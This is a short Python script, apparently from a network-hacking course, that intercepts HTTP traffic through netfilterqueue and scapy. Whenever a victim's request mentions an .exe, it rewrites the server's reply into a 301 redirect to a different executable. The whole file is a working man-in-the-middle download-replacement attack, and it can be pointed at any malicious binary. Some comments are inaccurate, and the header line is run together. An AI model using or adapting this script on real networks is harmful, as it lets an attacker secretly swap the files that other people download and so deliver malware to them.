#!/usr/bin/env pythonimport netfilterqueueimport scapy.all as scapyack

1. #!/usr/bin/env python
2. import netfilterqueue
3. import scapy.all as scapy
4.  
5.  
6. ack_list = []
7. def process_packet(packet):
8.     #RR - Resoucre Record(Response) QR-Question Record(Request)
9.     #method get_payload() gives all information that packets contain
10.     #we have to convert get_payload() method to a scapy
11.     #so we can use all stuff that scapy allows us. See layers,modify it fields etc..
12.     scapy_packet = scapy.IP(packet.get_payload())
13.     #if packet contains a dns response
14.     if scapy_packet.haslayer(scapy.Raw):
15.         if scapy_packet[scapy.TCP].dport == 80: #destination port; means to http from our sport 39266
16.             if 'exe' in scapy_packet[scapy.Raw].load:
17.                 print('[+] exe Request')
18.                 ack_list.append(scapy_packet[scapy.TCP].ack)
19.         elif scapy_packet[scapy.TCP].sport == 80: #source port; means from http to our dport 39266
20.             if scapy_packet[scapy.TCP].seq in ack_list:
21.                 ack_list.remove(scapy_packet[scapy.TCP].seq)
22.                 print('[+] Replacing file')
23.                 scapy_packet[scapy.Raw].load = 'HTTP/1.1 301 Moved Permanently\nLocation: https://www.rarlab.com/rar/wrar591ru.exe\n\n'
24.                 del scapy_packet[scapy.IP].len
25.                 del scapy_packet[scapy.IP].chksum
26.                 del scapy_packet[scapy.TCP].chksum
27.                 packet.set_payload(str(scapy_packet))
28.  
29.     packet.accept()
30.  
31.  
32.  
33.  
34. queue = netfilterqueue.NetfilterQueue()
35. #bind, so we can have access to iptables queue
36. #process_packet is func that will be executed on each packet that will be trap in queue
37. #0 is because we named like that our queue in iptables
38. queue.bind(0, process_packet)
39. queue.run()